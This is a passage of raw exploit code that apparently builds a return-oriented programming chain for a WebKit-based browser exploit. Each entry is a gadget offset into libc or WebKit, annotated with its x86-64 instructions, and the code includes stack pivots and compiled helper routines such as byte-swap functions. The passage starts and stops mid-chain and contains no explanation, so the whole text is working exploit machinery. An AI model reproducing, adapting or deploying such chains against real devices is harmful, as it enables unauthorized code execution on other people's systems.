libc_base+763368, //pop rcx
__swbuf_addr,
webkit_base+20307877, //mov [rax], rcx
libc_base+764760 //pop rsi
]);
db([4294967192, 4294967295]); // -0x68
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760 //pop rsi
]);
db([48, 0]); // 0x30
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+731401, //mov rax, r8
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([32, 0]); // 0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760 //pop rsi
]);
db([24, 0]); // 0x18
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([128, 0]); // 0x80
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+142896, //L1951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+782311 //pop rsp
]);
//L1951:
db([0, 0]); // 0x0
//___bswap64_var:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+142968, //L1953
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L1953:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+143064, //L1954
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+143096, //L1957
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L1954:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1956:
db([16, 0]); // 0x10
set_gadget(webkit_base+568675,); //pop r8
//L1957:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+143200, //L1960
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+143184, //L1958
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1958:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1960:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+143312, //L1961
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+143344, //L1963
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+143328, //L1962
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1961:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1962:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1963:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+143448, //L1964
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+143464, //L1965
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L1964:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1965:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+143584, //L1966
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+143568, //L1967
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L1967:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L1966:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+143672, //L1969
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+143656, //L1968
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1968:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1969:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+143776, //L1970
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+143792, //L1971
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L1970:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1971:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+143912, //L1972
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+143896, //L1973
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L1973:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L1972:
db([0, 0]); // 0x0
//___bswap32_var:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+143984, //L1975
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L1975:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+144080, //L1976
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+144112, //L1979
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L1976:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1978:
db([16, 0]); // 0x10
set_gadget(webkit_base+568675,); //pop r8
//L1979:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+144216, //L1982
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+144200, //L1980
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1980:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1982:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+144392, //L1985
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+144408, //L1986
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+144360, //L1983
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+144376, //L1984
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1983:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L1984:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1985:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1986:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+144568, //L1990
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+144536, //L1988
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+144552, //L1989
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1987:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L1988:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1989:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1990:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+144688, //L1991
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+144720, //L1993
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+144704, //L1992
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1991:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1992:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1993:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+144824, //L1994
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+144840, //L1995
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L1994:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1995:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+144960, //L1996
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+144944, //L1997
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L1997:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L1996:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+145048, //L1999
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+145032, //L1998
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L1998:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1999:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+145152, //L2000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+145168, //L2001
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2000:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2001:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+145288, //L2002
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+145272, //L2003
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2003:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2002:
db([0, 0]); // 0x0
//___bswap16_var:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+145360, //L2005
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2005:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+145456, //L2006
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+145488, //L2009
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L2006:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2008:
db([16, 0]); // 0x10
set_gadget(webkit_base+568675,); //pop r8
//L2009:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+145592, //L2012
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+145576, //L2010
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2010:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2012:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224144, //mov ax, [rdi]
libc_base+764760, //pop rsi
ropchain+145752, //L2016
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+145720, //L2014
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+145736, //L2015
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2013:
db([16, 0]); // 0x10
set_gadget(webkit_base+3236123,); //pop r9
//L2014:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2015:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2016:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+145808, //L2018
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2018:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+145936, //L2020
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+145952, //L2021
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+145920, //L2019
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2019:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2020:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2021:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+146112, //L2025
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+146080, //L2023
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+146096, //L2024
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2022:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L2023:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2024:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2025:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+146216, //L2027
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+146200, //L2026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2026:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2027:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2028:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L2029:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+146424, //L2032
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+146408, //L2031
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2030:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L2031:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2032:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+146528, //L2034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+146512, //L2033
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2033:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2034:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+146608, //L2035
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2035:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2037:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+146728, //L2040
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+146712, //L2038
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2038:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2040:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224144, //mov ax, [rdi]
libc_base+764760, //pop rsi
ropchain+146888, //L2044
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+146856, //L2042
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+146872, //L2043
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2041:
db([16, 0]); // 0x10
set_gadget(webkit_base+3236123,); //pop r9
//L2042:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2043:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2044:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+146944, //L2046
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2046:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+147072, //L2048
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+147088, //L2049
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+147056, //L2047
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2047:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2048:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2049:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+147248, //L2053
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+147216, //L2051
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+147232, //L2052
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2050:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L2051:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2052:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2053:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+147352, //L2055
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+147336, //L2054
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2054:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2055:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L2056:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L2057:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+147552, //L2060
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+147536, //L2059
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2058:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L2059:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2060:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+147656, //L2062
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+147640, //L2061
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2061:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2062:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+147768, //L2065
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+147752, //L2064
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2063:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L2064:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2065:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+147832, //L2067
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+763368 //pop rcx
]);
//L2067:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+147888, //L2068
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2068:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+148040, //L2071
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+148056, //L2072
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+148024, //L2070
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2070:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2071:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2072:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+148216, //L2076
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+148184, //L2074
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+148200, //L2075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2073:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L2074:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2075:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2076:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+148336, //L2077
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+148368, //L2079
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+148352, //L2078
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2077:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2078:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2079:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+148472, //L2080
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+148488, //L2081
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2080:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2081:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+148608, //L2082
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
